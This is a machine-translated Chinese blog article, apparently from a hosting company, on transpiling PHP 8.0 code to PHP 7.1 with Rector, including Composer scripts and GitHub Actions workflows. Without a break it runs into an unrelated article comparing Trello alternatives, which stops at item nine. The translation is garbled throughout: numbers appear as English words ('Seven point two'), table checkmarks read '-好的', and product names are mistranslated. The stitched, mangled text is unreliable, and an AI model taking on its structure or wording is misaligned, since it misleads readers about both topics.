if (!defined('PHP_VERSION_ID') || (defined('PHP_VERSION_ID') && PHP_VERSION_ID < 80000)) {
if (!function_exists('str_contains')) {
/**
* Checks if a string contains another
*
* @param string $haystack The string to search in
* @param string $needle The string to search
* @return boolean Returns TRUE if the needle was found in haystack, FALSE otherwise.
*/
function str_contains(string $haystack, string $needle): bool
{
return strpos($haystack, $needle) !== false;
}
}
}
因为反向移植比传输简单,所以每当反向移植完成工作时,我们都应该选择这种解决方案。
关于 PHP 8.0 到 7.1 之间的范围,我们可以使用 Symfony 的 polyfill 库:
这些库支持以下函数、类、常数和接口:
| PHP 版本 | 特征 |
|---|---|
| Seven point two | Functions: |
常数:
|
| Seven point three | Functions:
例外情况:
|
| Seven point four | 功能:
|
| Eight | Interfaces:
Stringable
类别:
ValueErrorUnhandledMatchError
常数:
FILTER_VALIDATE_BOOL
功能:
- T2
fdiv - T2
get_debug_type - T2
preg_last_error_msg - T2
str_contains - T2
str_starts_with - T2
str_ends_with - T2
get_resource_id
|
传输 PHP 的例子
让我们来看看几个被完全编译的 PHP 代码的例子,以及几个被完全编译的包。
PHP 代码
match表达式是在 PHP 8.0 中引入的。该源代码:
function getFieldValue(string $fieldName): ?string
{
return match($fieldName) {
'foo' => 'foofoo',
'bar' => 'barbar',
'baz' => 'bazbaz',
default => null,
};
}
…将通过使用switch操作符转换成其等效的 PHP 7.4 版本:
function getFieldValue(string $fieldName): ?string
{
switch ($fieldName) {
case 'foo':
return 'foofoo';
case 'bar':
return 'barbar';
case 'baz':
return 'bazbaz';
default:
return null;
}
}
PHP 8.0 中也引入了 nullsafe 操作符:
public function getValue(TypeResolverInterface $typeResolver): ?string
{
return $this->getResolver($typeResolver)?->getValue();
}
transpiled 代码需要首先将操作的值赋给一个新变量,以避免执行操作两次:
public function getValue(TypeResolverInterface $typeResolver): ?string
{
return ($val = $this->getResolver($typeResolver)) ? $val->getValue() : null;
}
PHP 8.0 中引入的构造函数属性提升特性允许开发人员编写更少的代码:
class QueryResolver
{
function __construct(protected QueryFormatter $queryFormatter)
{
}
}
当将其转换为 PHP 7.4 时,会生成完整的代码:
class QueryResolver
{
protected QueryFormatter $queryFormatter;
function __construct(QueryFormatter $queryFormatter)
{
$this->queryFormatter = $queryFormatter;
}
}
上面的 transpiled 代码包含了 PHP 7.4 中引入的类型属性。将代码下载到 PHP 7.3,用文档块替换它们:
class QueryResolver
{
/**
* @var QueryFormatter
*/
protected $queryFormatter;
function __construct(QueryFormatter $queryFormatter)
{
$this->queryFormatter = $queryFormatter;
}
}
PHP 包
正在为生产传输以下库:
| 库/描述 | 代码/注释 |
|---|---|
| 使传输成为可能的 PHP 重建工具 | –源代码 |
| –传输代码–备注 | |
| 简易编码标准 | |
| 工具让 PHP 代码遵守一套规则 | –源代码 |
| –传输代码 | |
| –备注 | |
| 为 WordPress 提供 GraphQL 服务器的插件 | –源代码 |
| –传输代码 | |
| –备注 |
传输 PHP 的利与弊
迁移 PHP 的好处已经描述过了:它允许源代码使用 PHP 8.0(即 PHP 的最新版本),该版本将被转换为 PHP 的较低版本,以便在遗留应用程序或环境中运行。
这有效地允许我们成为更好的开发人员,生产更高质量的代码。这是因为我们的源代码可以使用 PHP 8.0 的联合类型、PHP 7.4 的类型化属性以及添加到每个新版本 PHP 中的不同类型和伪类型(来自 PHP 8.0 的mixed、来自 PHP 7.2 的object),以及 PHP 的其他现代特性。
使用这些特性,我们可以在开发过程中更好地捕捉错误,并编写更易于阅读的代码。
现在,我们来看看弊端。
必须对其进行编码和维护
Rector 可以自动传输代码,但该过程可能需要一些手动输入,以使其与我们的特定设置一起工作。
第三方库也必须是透明的
每当编译它们产生错误时,这就成了一个问题,因为我们必须钻研它们的源代码来找出可能的原因。如果问题可以解决,项目是开源的,我们将需要提交一个拉请求。如果库不是开源的,我们可能会遇到障碍。
当代码无法传输时,Rector 不会通知我们
如果源代码包含 PHP 8.0 属性或任何其他无法转换的特性,我们就无法继续。但是,Rector 不会检查这个条件,所以我们需要手动检查。对于我们自己的源代码来说,这可能不是一个大问题,因为我们已经很熟悉它了,但是对于第三方依赖来说,这可能会成为一个障碍。
调试信息使用转换后的代码,而不是源代码
当应用程序在生产中产生一个带有堆栈跟踪的错误消息时,行号将指向传输的代码。我们需要从 transpiled 转换回原始代码,以便在源代码中找到相应的行号。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
传输代码也必须有前缀
我们的 transpiled 项目和其他一些也安装在生产环境中的库可以使用相同的第三方依赖项。这个第三方依赖项将为我们的项目转换,并为其他库保留其原始源代码。因此,transpiled 版本必须通过 PHP-Scoper 、 Strauss 或其他一些工具作为前缀,以避免潜在的冲突。
传输必须发生在持续集成(CI)期间
因为传输的代码自然会覆盖源代码,所以我们不应该在我们的开发计算机上运行传输过程,否则我们将冒产生副作用的风险。在 CI 运行期间运行流程更合适(下面将详细介绍)。
如何移植 PHP
首先,我们需要在我们的开发项目中安装 Rector:
composer require rector/rector --dev
然后,我们在项目的根目录中创建一个包含所需规则集的rector.php配置文件。为了将代码从 PHP 8.0 降级到 7.1,我们使用以下配置:
use Rector\Set\ValueObject\DowngradeSetList;
use Symfony\Component\DependencyInjection\Loader\Configurator\ContainerConfigurator;
return static function (ContainerConfigurator $containerConfigurator): void {
$containerConfigurator->import(DowngradeSetList::PHP_80);
$containerConfigurator->import(DowngradeSetList::PHP_74);
$containerConfigurator->import(DowngradeSetList::PHP_73);
$containerConfigurator->import(DowngradeSetList::PHP_72);
};
为了确保进程按预期执行,我们可以在干模式下运行 Rector 的process命令,传递要处理的位置(在本例中,是文件夹src/下的所有文件):
vendor/bin/rector process src --dry-run
为了执行传输,我们运行 Rector 的process命令,这将在文件的现有位置修改文件:
vendor/bin/rector process src
请注意:如果我们在开发计算机上运行rector process,源代码将在src/下被转换。但是,我们希望在不同的位置生成转换后的代码,而不是在降级代码时覆盖源代码。因此,在持续集成期间运行流程是最合适的。
优化运输流程
要生成用于生产的 transpiled 可交付物,只需转换用于生产的代码;只需要开发的代码可以跳过。这意味着我们可以避免传输所有的测试(对于我们的项目和它的依赖项)和所有的开发依赖项。
关于测试,我们已经知道我们项目的测试在哪里——例如,在文件夹tests/下。我们还必须找出依赖项在哪里——例如,在它们的子文件夹tests/、test/和Test/下(不同的库)。然后,我们告诉 Rector 跳过处理这些文件夹:
return static function (ContainerConfigurator $containerConfigurator): void {
// ...
$parameters->set(Option::SKIP, [
// Skip tests
'*/tests/*',
'*/test/*',
'*/Test/*',
]);
};
关于依赖项,Composer 知道哪些是用于开发的(那些在composer.json的条目require-dev下),哪些是用于生产的(那些在条目require下)。
为了从 Composer 中检索所有生产依赖项的路径,我们运行:
composer info --path --no-dev
该命令将生成一个依赖项列表,包括它们的名称和路径,如下所示:
brain/cortex /Users/leo/GitHub/leoloso/PoP/vendor/brain/cortex
composer/installers /Users/leo/GitHub/leoloso/PoP/vendor/composer/installers
composer/semver /Users/leo/GitHub/leoloso/PoP/vendor/composer/semver
guzzlehttp/guzzle /Users/leo/GitHub/leoloso/PoP/vendor/guzzlehttp/guzzle
league/pipeline /Users/leo/GitHub/leoloso/PoP/vendor/league/pipeline
我们可以提取所有的路径,并将它们输入到 Rector 命令中,然后该命令将处理我们项目的src/文件夹以及那些包含所有生产依赖项的文件夹:
$ paths="$(composer info --path --no-dev | cut -d' ' -f2- | sed 's/ //g' | tr '\n' ' ')"
$ vendor/bin/rector process src $paths
进一步的改进可以防止 Rector 处理那些已经在使用目标 PHP 版本的依赖项。如果一个库是用 PHP 7.1(或以下任何版本)编写的,那么就没有必要把它移植到 PHP 7.1。
为了实现这一点,我们可以获得需要 PHP 7.2 及以上版本的库的列表,并只处理那些库。我们将通过 Composer 的why-not命令获得所有这些库的名称,如下所示:
composer why-not php "7.1.*" | grep -o "\S*\/\S*"
因为该命令不与--no-dev标志一起使用,为了只包括生产依赖项,我们首先需要删除开发依赖项并重新生成自动加载程序,执行该命令,然后再次添加它们:
$ composer install --no-dev
$ packages=$(composer why-not php "7.1.*" | grep -o "\S*\/\S*")
$ composer install
Composer 的info --path命令检索包的路径,格式如下:
# Executing this command
$ composer info psr/cache --path
# Produces this response:
psr/cache /Users/leo/GitHub/leoloso/PoP/vendor/psr/cache
我们对列表中的所有项目执行此命令,以获取到 transpile 的所有路径:
需要一个给你带来竞争优势的托管解决方案吗?Kinsta 为您提供了令人难以置信的速度、一流的安全性和自动伸缩功能。查看我们的计划
for package in $packages
do
path=$(composer info $package --path | cut -d' ' -f2-)
paths="$paths $path"
done
最后,我们将这个列表提供给 Rector(加上项目的src/文件夹):
vendor/bin/rector process src $paths
编译代码时要避免的陷阱
编译代码可以被认为是一门艺术,通常需要针对项目进行调整。让我们看看我们可能会遇到的几个问题。
链式规则并不总是被处理
链式规则是指一个规则需要转换前一个规则产生的代码。
例如,库symfony/cache包含这个代码:
final class CacheItem implements ItemInterface
{
public function tag($tags): ItemInterface
{
// ...
return $this;
}
}
当从 PHP 7.4 转换到 7.3 时,函数tag必须经历两次修改:
- 由于规则
DowngradeCovariantReturnTypeRector,返回类型ItemInterface必须首先转换为self - 由于规则
DowngradeSelfTypeDeclarationRector,返回类型self必须被移除
最终结果应该是这样的:
final class CacheItem implements ItemInterface
{
public function tag($tags)
{
// ...
return $this;
}
}
但是,Rector 只输出中间阶段:
final class CacheItem implements ItemInterface
{
public function tag($tags): self
{
// ...
return $this;
}
}
问题是 Rector 不能总是控制规则应用的顺序。
解决方案是识别哪些链接的规则没有被处理,并执行新的 Rector 运行来应用它们。
为了识别链接的规则,我们对源代码运行两次 Rector,如下所示:
$ vendor/bin/rector process src
$ vendor/bin/rector process src --dry-run
第一次,我们像预期的那样运行 Rector,以执行传输文件。第二次,我们使用--dry-run标志来发现是否仍然需要进行更改。如果有,该命令将退出并显示一个错误代码,并且“diff”输出将指示哪些规则仍然可以应用。这意味着第一次运行没有完成,一些链接的规则没有被处理。
Running Rector with –dry-run flag
一旦我们确定了未应用的链接规则,我们就可以创建另一个目录配置文件——例如,rector-chained-rule.php将执行缺失的规则。这一次,我们可以在需要应用规则的特定文件上运行特定的缺失规则,而不是为src/下的所有文件处理一整套规则:
// rector-chained-rule.php
use Rector\Core\Configuration\Option;
use Rector\DowngradePhp74\Rector\ClassMethod\DowngradeSelfTypeDeclarationRector;
use Symfony\Component\DependencyInjection\Loader\Configurator\ContainerConfigurator;
return static function (ContainerConfigurator $containerConfigurator): void {
$services = $containerConfigurator->services();
$services->set(DowngradeSelfTypeDeclarationRector::class);
$parameters = $containerConfigurator->parameters();
$parameters->set(Option::PATHS, [
__DIR__ . '/vendor/symfony/cache/CacheItem.php',
]);
};
最后,我们在第二次传递时通过输入--config告诉 Rector 使用新的配置文件:
# First pass with all modifications
$ vendor/bin/rector process src
# Second pass to fix a specific problem
$ vendor/bin/rector process --config=rector-chained-rule.php
编写器依赖关系可能不一致
库可以声明一个将要开发的依赖项(即在composer.json中的require-dev下),但是仍然引用它们的一些代码用于生产(比如在src/下的一些文件上,而不是tests/)。
通常,这不是问题,因为这些代码可能不会在生产中加载,所以应用程序中永远不会出现错误。但是,当 Rector 处理源代码及其依赖项时,它会验证是否可以加载所有引用的代码。如果任何文件引用了非安装库中的某段代码,Rector 将抛出一个错误(因为它被声明为仅用于开发)。
例如,Symfony 的缓存组件中的类 EarlyExpirationHandler 实现了 Messenger 组件中的接口 MessageHandlerInterface :
class EarlyExpirationHandler implements MessageHandlerInterface
{
//...
}
然而,symfony/cache声明symfony/messenger是开发的依赖。然后,当在依赖于symfony/cache的项目上运行 Rector 时,它会抛出一个错误:
[ERROR] Could not process "vendor/symfony/cache/Messenger/EarlyExpirationHandler.php" file, due to:
"Analyze error: "Class Symfony\Component\Messenger\Handler\MessageHandlerInterface not found.". Include your files in "$parameters->set(Option::AUTOLOAD_PATHS, [...]);" in "rector.php" config.
See https://github.com/rectorphp/rector#configuration".
这个问题有三种解决方案:
- 在目录配置中,跳过处理引用这段代码的文件:
return static function (ContainerConfigurator $containerConfigurator): void {
// ...
$parameters->set(Option::SKIP, [
__DIR__ . '/vendor/symfony/cache/Messenger/EarlyExpirationHandler.php',
]);
};
- 下载缺失的库并添加其路径,以便由 Rector 自动加载:
return static function (ContainerConfigurator $containerConfigurator): void {
// ...
$parameters->set(Option::AUTOLOAD_PATHS, [
__DIR__ . '/vendor/symfony/messenger',
]);
};
- 让您的项目依赖于缺失的库进行生产:
composer require symfony/messenger
传输和持续集成
如前所述,在我们的开发计算机中,当运行 Rector 时,我们必须使用--dry-run标志,否则,源代码将被 transpiled 代码覆盖。出于这个原因,在持续集成(CI)期间运行实际的 transpiling 流程更合适,在持续集成期间,我们可以启动临时运行程序来执行流程。
执行传输过程的理想时间是为我们的项目生成发布的时候。例如,下面的代码是 GitHub 动作的工作流,它创建了一个 WordPress 插件的发布:
name: Generate Installable Plugin and Upload as Release Asset
on:
release:
types: [published]
jobs:
build:
name: Build, Downgrade and Upload Release
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/[[email protected]](/cdn-cgi/l/email-protection)
- name: Downgrade code for production (to PHP 7.1)
run: |
composer install
vendor/bin/rector process
sed -i 's/Requires PHP: 7.4/Requires PHP: 7.1/' graphql-api.php
- name: Build project for production
run: |
composer install --no-dev --optimize-autoloader
mkdir build
- name: Create artifact
uses: montudor/[[email protected]](/cdn-cgi/l/email-protection)
with:
args: zip -X -r build/graphql-api.zip . -x *.git* node_modules/\* .* "*/\.*" CODE_OF_CONDUCT.md CONTRIBUTING.md ISSUE_TEMPLATE.md PULL_REQUEST_TEMPLATE.md rector.php *.dist composer.* dev-helpers** build**
- name: Upload artifact
uses: actions/[[email protected]](/cdn-cgi/l/email-protection)
with:
name: graphql-api
path: build/graphql-api.zip
- name: Upload to release
uses: JasonEtco/[[email protected]](/cdn-cgi/l/email-protection)
with:
args: build/graphql-api.zip application/zip
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
这个工作流程包含了一个通过 GitHub Actions 发布 WordPress 插件的标准程序。新增的将插件代码从 PHP 7.4 转换到 7.1 的操作发生在以下步骤:
- name: Downgrade code for production (to PHP 7.1)
run: |
vendor/bin/rector process
sed -i 's/Requires PHP: 7.4/Requires PHP: 7.1/' graphql-api.php
总之,此工作流现在执行以下步骤:
- 从资源库中签出用 PHP 7.4 编写的 WordPress 插件的源代码
- 安装其编写器依赖项
- 将其代码从 PHP 7.4 移植到 7.1
- 将插件主文件头中的“需要 PHP”条目从
"7.4"修改为"7.1" - 消除开发所需的依赖性
- 创建插件的。zip 文件,不包括所有不需要的文件
- 上传。zip 文件作为发布资产(此外,作为 GitHub 动作的工件)
测试编译的代码
一旦代码被转换到 PHP 7.1,我们如何知道它工作得很好?或者,换句话说,我们如何知道它已经被彻底转换,并且没有留下更高版本 PHP 代码的残余?
类似于传输代码,我们可以在 CI 流程中实现解决方案。这个想法是用 PHP 7.1 建立 runner 的环境,并在 transpiled 代码上运行一个 linter。如果任何一段代码与 PHP 7.1 不兼容(比如 PHP 7.4 中没有转换的类型化属性),那么 linter 将抛出一个错误。
一个适用于 PHP 的 linter 是 PHP 并行 Lint 。我们可以将该库安装为项目开发的依赖项,或者让 CI 流程将其安装为独立的 Composer 项目:
composer create-project php-parallel-lint/php-parallel-lint
每当代码包含 PHP 7.2 及以上版本,PHP Parallel Lint 都会抛出类似这个的错误:
Run php-parallel-lint/parallel-lint layers/ vendor/ --exclude vendor/symfony/polyfill-ctype/bootstrap80.php --exclude vendor/symfony/polyfill-intl-grapheme/bootstrap80.php --exclude vendor/symfony/polyfill-intl-idn/bootstrap80.php --exclude vendor/symfony/polyfill-intl-normalizer/bootstrap80.php --exclude vendor/symfony/polyfill-mbstring/bootstrap80.php
PHP 7.1.33 | 10 parallel jobs
............................................................ 60/2870 (2 %)
............................................................ 120/2870 (4 %)
...
............................................................ 660/2870 (22 %)
.............X.............................................. 720/2870 (25 %)
............................................................ 780/2870 (27 %)
...
............................................................ 2820/2870 (98 %)
.................................................. 2870/2870 (100 %)
Checked 2870 files in 15.4 seconds
Syntax error found in 1 file
------------------------------------------------------------
Parse error: layers/GraphQLAPIForWP/plugins/graphql-api-for-wp/graphql-api.php:55
53| '0.8.0',
54| \__('GraphQL API for WordPress', 'graphql-api'),
> 55| ))) {
56| $plugin->setup();
57| }
Unexpected ')' in layers/GraphQLAPIForWP/plugins/graphql-api-for-wp/graphql-api.php on line 55
Error: Process completed with exit code 1.
让我们将 linter 添加到 CI 的工作流中。将代码从 PHP 8.0 转换到 7.1 并进行测试的步骤如下:
- 查看源代码
- 让环境运行 PHP 8.0,这样 Rector 就可以解释源代码
- 将代码转换到 PHP 7.1
- 安装 PHP linter 工具
- 将环境的 PHP 版本切换到 7.1
- 在传输的代码上运行 linter
这个 GitHub 动作工作流完成工作:
name: Downgrade PHP tests
jobs:
main:
name: Downgrade code to PHP 7.1 via Rector, and execute tests
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/[[email protected]](/cdn-cgi/l/email-protection)
- name: Set-up PHP
uses: shivammathur/[[email protected]](/cdn-cgi/l/email-protection)
with:
php-version: 8.0
coverage: none
- name: Local packages - Downgrade PHP code via Rector
run: |
composer install
vendor/bin/rector process
# Prepare for testing on PHP 7.1
- name: Install PHP Parallel Lint
run: composer create-project php-parallel-lint/php-parallel-lint --ansi
- name: Switch to PHP 7.1
uses: shivammathur/[[email protected]](/cdn-cgi/l/email-protection)
with:
php-version: 7.1
coverage: none
# Lint the transpiled code
- name: Run PHP Parallel Lint on PHP 7.1
run: php-parallel-lint/parallel-lint src/ vendor/ --exclude vendor/symfony/polyfill-ctype/bootstrap80.php --exclude vendor/symfony/polyfill-intl-grapheme/bootstrap80.php --exclude vendor/symfony/polyfill-intl-idn/bootstrap80.php --exclude vendor/symfony/polyfill-intl-normalizer/bootstrap80.php --exclude vendor/symfony/polyfill-mbstring/bootstrap80.php
请注意,Symfony 的 polyfill 库中的几个bootstrap80.php文件(不需要传输)必须从 linter 中排除。这些文件包含 PHP 8.0,所以 linter 在处理它们时会抛出错误。然而,排除这些文件是安全的,因为只有当运行 PHP 8.0 或更高版本时,它们才会被加载到生产中:
if (\PHP_VERSION_ID >= 80000) {
return require __DIR__.'/bootstrap80.php';
}
无论你是在为 WordPress 创建一个公共插件,还是在更新旧代码,都有很多原因让你无法使用最新的 PHP 版本👩💻在本指南中了解 transpiling 如何提供帮助👇
摘要
这篇文章告诉我们如何转换我们的 PHP 代码,允许我们在源代码中使用 PHP 8.0 并创建一个在 PHP 7.1 上工作的版本。传输是通过 PHP 重构工具的完成的。
编译我们的代码使我们成为更好的开发人员,因为我们可以更好地捕捉开发中的错误,并生成自然更容易阅读和理解的代码。
Transpiling 还使我们能够将具有特定 PHP 需求的代码从 CMS 中分离出来。如果我们希望使用最新版本的 PHP 来创建一个公开可用的 WordPress 插件或 Drupal 模块,而不严重限制我们的用户群,我们现在可以这样做。
关于 PHP 的翻译,你还有什么问题吗?请在评论区告诉我们!
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
2022 年 18 款最佳 Trello 替代品(功能、价格、用户界面对比)
在寻找特雷罗的替代品吗?在新冠肺炎的商业领域,远程工作已经成为主流。但是,没有合适的工具,您无法管理远程工作人员。
有超过 249 个项目管理软件工具拥有显著的市场份额,其中大多数都支持看板。
众多的选择让您很难为自己的企业选择合适的解决方案。为了让事情变得更容易,我们检查了明确的市场领导者和新贵,并将其缩小到一个更容易管理的 18 个合法的特雷罗替代品列表。
我们将涵盖所有内容,从特性、计划、定价、UX 和合适的用例。
准备好了吗?我们开始吧!
特雷罗简介
曾经让特雷罗与 T2 和其他项目管理解决方案区别开来的关键方面是看板功能:
Kanban board example (Source: Hygger.io)
看板本质上是不同项目在不同阶段的视觉表现。它最初是作为一种使用白板来可视化丰田项目进展的方式。Trello 的创始人 Joel Spolsky 后来使用这个概念创建了一个更有用的项目协作和管理界面。
如今,所有主要的项目管理工具(包括 Asana 、吉拉、微软项目和计划工具等等)都提供了看板功能。
一般来说,这使得它们在可用性上与 Trello 非常相似。
谷歌有类似 Trello 的东西吗?
谷歌还没有用自己的专用解决方案来解决项目管理领域的问题。但是你可以重新利用谷歌的一个基于云的解决方案来合作和管理项目。
Google Keep 是 Google 的笔记应用程序,包括待办事项功能:
Google Keep
你也可以与其他谷歌用户分享某些卡片,创建自定义标签和设置提醒。当然,解决方案远非完美。你不能设置截止日期或访问看板视图。
微软有类似 Trello 的东西吗?
Microsoft 提供了两个独立的项目管理工具,您可以使用它们来替代 Trello: Microsoft Planner 和 Microsoft Project。
Microsoft Planner
Microsoft Planner 是一个围绕看板视图的简单任务管理和协作工具。
它包含在所有的 Office 365 业务计划中,包括每个用户每月 5 美元起的 Business Basic(以前的 Business Essentials)。
Microsoft Project
微软项目是一个更高级的项目管理工具,关注详细的时间表、任务责任等等。
虽然它与 Office 365 工具集成,但它不是任何 Office 365 计划的一部分,每个用户每月 10 美元起。我们将在下面更详细地介绍这两种工具。
有 249 种以上的项目管理工具...但幸运的是,这个列表只列出了前 18 名😅因此,您可以轻松找到适合#remote 团队的最佳 Trello 替代方案📊 点击推文
18 大 Trello 备选方案
如果你正在寻找一个真正的特雷罗替代品,请继续阅读下面的内容。
1.阿萨纳
Asana
Asana 是一个领先的项目管理工具,在过去几年里已经转变为一个主要基于看板的视图。
功能和定价
| 特征 | 特雷罗 | 阿萨纳 |
| 看板视图 | -好的 | -好的 |
| 持卡人 | -好的 | -好的 |
| 最后期限 | -好的 | -好的 |
| 工作流自动化工具 | -好的 | -好的 |
| 集成 | 181(溢价) | One hundred and fifty-eight |
| 时间轴视图 | (免费通电) | (高级) |
谈到任务管理的看板方法,Asana 和 Trello 有相似的特点。它还包括更高级的工作流自动化功能和三种不同的视图。
Asana pricing
免费计划包括多达 15 个用户,而他们的高级计划每个用户每月 10.99 美元起。
用户体验
Asana UI
“Board”视图或选项卡提供了与 Trello 几乎完全相同的用户体验。您可以将任务从一个阶段拖放到下一个阶段,或者单击它们来查看和编辑详细信息。
总的来说,开始体式并开始创建和分配任务是非常容易的。
集成
Asana integrations
Asana 有 158 个原生集成,包括主要应用程序,如 Slack ,Office 365 和 Salesforce。
体式的使用案例
- 拥有复杂项目和多个任务所有者的小型团队。
- 具有复杂工作流程的大型团队。
Asana 比 Trello 强吗?
由于概念和用例的不同,很难称之为客观上更好的选择。
但是一旦你理解了它们之间的区别,你可能就会明白哪个选择更适合你的公司。阅读我们对 Asana 和 Trello 的详细比较,对这两种工具有更全面的了解。
2.充气台
Airtable
Airtable 是一个智能的“部分是电子表格,部分是数据库”的解决方案,公司可以用它来管理团队和项目。我们用它来管理与客户关系相关的任务。
功能和定价
| 特征 | 特雷罗 | 充气台 |
| 看板视图 | -好的 | -好的 |
| 持卡人 | -好的 | -好的 |
| 最后期限 | -好的 | -好的 |
| 工作流自动化工具 | -好的 | -好的 |
| 集成 | 181(溢价) | Thirty-two |
| 日历视图 | (免费通电) | -好的 |
Airtable 不仅有电子表格视图,还有看板视图和日历视图,用于管理任务。
Airtable Pricing
免费计划包括 1,200 行和 5GB 存储空间。Plus 起价为每个用户每月 10 美元。
用户体验
默认的用户体验感觉更像一个更强大的 Excel 或 Google sheets 版本。
Airtable UI
但是对于 Trello 的早期用户来说,看板视图是直观且易于使用的。
Kanban view in Airtable
通过单击每列中的加号轻松添加新项目,并根据您的需要移动卡片。
集成
Airtable integrations
Airtable 通过他们的 API 有 32 个本地集成,但通过 Zapier 和其他集成 SaaS 解决方案支持超过 1000 个。
Airtable 的使用案例
- 除了项目管理之外,还需要数据组织功能的公司。
- 喜欢使用电子表格的用户。
3. Basecamp
Basecamp
Basecamp 不仅仅是一个项目管理工具,它还是一个协作和工作流平台。
功能和定价
| 特征 | 特雷罗 | Basecamp |
| 看板视图 | -好的 | X |
| 持卡人 | -好的 | -好的 |
| 最后期限 | -好的 | -好的 |
| 工作流自动化工具 | -好的 | -好的 |
| 集成 | 181(溢价) | Forty-six |
| 聊天和协作工具 | X | -好的 |
Basecamp 包括留言板、实时群聊和其他协作工具,不仅仅是常规的项目管理。
Basecamp pricing
Basecamp 采用每个公司每月 99 美元的固定价格(非用户), 30 天免费试用。
用户体验
Basecamp UI
Basecamp 将你的公司分成团队或项目。在个人团队视图中,您可以访问留言板、待办事项列表或 campfire 实时聊天。
Basecamp team view
集成
Basecamp integrations
Basecamp 3 通过其 API,并进一步通过 Zapier 和 Automate.io,拥有 45 个以上的原生集成。
Basecamp 的使用案例
- 需要单一项目管理和协作解决方案的公司。
- 希望降低按用户定价解决方案成本的公司。
4.吉拉
Jira
吉拉是 Atlassian(Trello 的母公司)的软件开发管理工具。
功能和定价
| 特征 | 特雷罗 | 吉拉 |
| 看板视图 | -好的 | -好的 |
| 持卡人 | -好的 | -好的 |
| 最后期限 | -好的 | -好的 |
| 工作流自动化工具 | -好的 | -好的 |
| 集成 | 181(溢价) | 1,000+ |
| 敏捷开发工具 | X | -好的 |
除了通过看板进行任务管理,吉拉还有敏捷开发工具,比如敏捷报告、bug 映射等等。
Jira pricing
吉拉的免费计划最多允许 10 个用户,标准计划每个用户每月 7 美元。
用户体验
Board view in Jira
吉拉的董事会观点几乎和特雷罗完全一样。
Version release in Jira
还有版本发布计划和视图来帮助软件开发人员继续工作。
集成
Jira integrations
吉拉有超过 1000 个应用和集成,包括 Github、Adobe XD 和其他重要的开发工具。
吉拉的使用案例
- 需要项目管理工具的软件公司。
5.微软项目
Microsoft Project
微软项目是微软的企业项目管理软件。
Microsoft Project 功能和定价
| 特征 | 特雷罗 | MS 项目 |
| 看板视图 | -好的 | -好的 |
| 持卡人 | -好的 | -好的 |
| 最后期限 | -好的 | -好的 |
| 工作流自动化工具 | -好的 | -好的 |
| 集成 | 181(溢价) | Seventeen |
| 时间表和冲刺 | X | -好的 |
Project 在任务列表网格和板视图中提供了基本的项目管理,以及用于敏捷开发的时间表和冲刺计划工具。
Microsoft Project pricing
基本计划从每个用户每月 10 美元开始。
用户体验
Project grid view
Microsoft Project 的基本网格或列表视图易于分配责任、截止日期等。
Project board view
对于已经习惯使用看板的用户来说,看板视图是完美的。
集成
Microsoft Project integrations
只有 16 个可用的应用和集成,很明显,在使用第三方工具扩展功能方面,微软项目远远落后。
然而,它确实与微软团队和其他 Office 365 应用程序进行了原生集成。
Microsoft Project 的使用案例
- 已经使用微软团队和 Office 365 进行协作的公司。
6.Microsoft 计划程序
Microsoft Planner 是面向中小型企业的 Project 替代产品,包含在所有 Microsoft 365 商业计划中。
Microsoft Planner 功能和定价
| 特征 | 特雷罗 | MS Planner |
| 看板视图 | -好的 | -好的 |
| 持卡人 | -好的 | -好的 |
| 最后期限 | -好的 | -好的 |
| 工作流自动化工具 | -好的 | (通过质谱流程) |
| 集成 | 181(溢价) | 10+ |
Microsoft Planner 只有基本的项目管理功能,并通过 Microsoft 365 套件提供了一些扩展功能。
Microsoft Planner pricing
Planner 包含在所有的 Microsoft 365 商业计划中,每个用户每月 5 美元起。
用户体验
Microsoft Planner UI
看板布局易于操作,任何有 Trello 经验的人都应该熟悉。
集成
Microsoft Planner UI
Planner 的集成很少,AppSource 中的相关结果不到 10 个。它确实与微软的工具如 Flow 和 Teams 集成在一起。
Microsoft Planner 的使用案例
- 订阅微软 365 其他应用程序的企业的基本规划工具。
7.工作区
Workzone
W orkzone 是一个专注于代理和产品团队的项目管理解决方案。
功能和定价
| 特征 | 特雷罗 | 工作区 |
| 看板视图 | -好的 | X |
| 持卡人 | -好的 | -好的 |
| 最后期限 | -好的 | -好的 |
| 工作流自动化工具 | -好的 | -好的 |
| 集成 | 181(溢价) | 17+ |
| 工作量管理 | X | -好的 |
Workzone 超越了基本的项目管理,还处理工作量跟踪和管理。
Workzone pricing
Workzone 没有免费计划,其最便宜的计划是每个用户每月 24 美元起。
用户体验
Workzone project dashboard
project dashboard 视图非常适合那些非常赶时间的公司。
集成
Workzone integrations
工作区有 17 个集成,包括微软团队和 Slack。
工作区的使用案例
- 希望使用单一工具进行项目和劳动力管理的公司。
8.wrike!wrike
Wrike
Wrike 是一个项目管理平台,为创意团队提供先进的工作流程工具。
功能和定价
| 特征 | 特雷罗 | wrike!wrike |
| 看板视图 | -好的 | -好的 |
| 持卡人 | -好的 | -好的 |
| 最后期限 | -好的 | -好的 |
| 工作流自动化工具 | -好的 | -好的 |
| 集成 | 181(溢价) | 400+ |
| 工作量管理 | X | -好的 |
除了基本的看板和任务管理,Wrike 还有甘特图视图、工作量管理工具和创造性工作流工具。
Wrike pricing
最多 5 个用户免费,pro 计划每个用户每月 9.8 美元起。
用户体验
Wrike UI
Wrike 的看板观点简单直观。您可以轻松地创建、分配和移动任务。
Wrike image commenting
它还包括创意审批工作流工具,包括图像审批和图像内评论。
集成
Wrike integrations
使用 Wrike Integrate 插件将 Wrike 与 400 多个不同的 SaaS 应用程序集成在一起。如果你是 Gmail 用户,也有一个插件。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
Wrike 的使用案例
- 工作流程复杂的营销和创意机构。
9.看板流
KanbanFlow
KanbanFlow 是 Trello 和其他项目管理工具的一个很好的免费替代品。
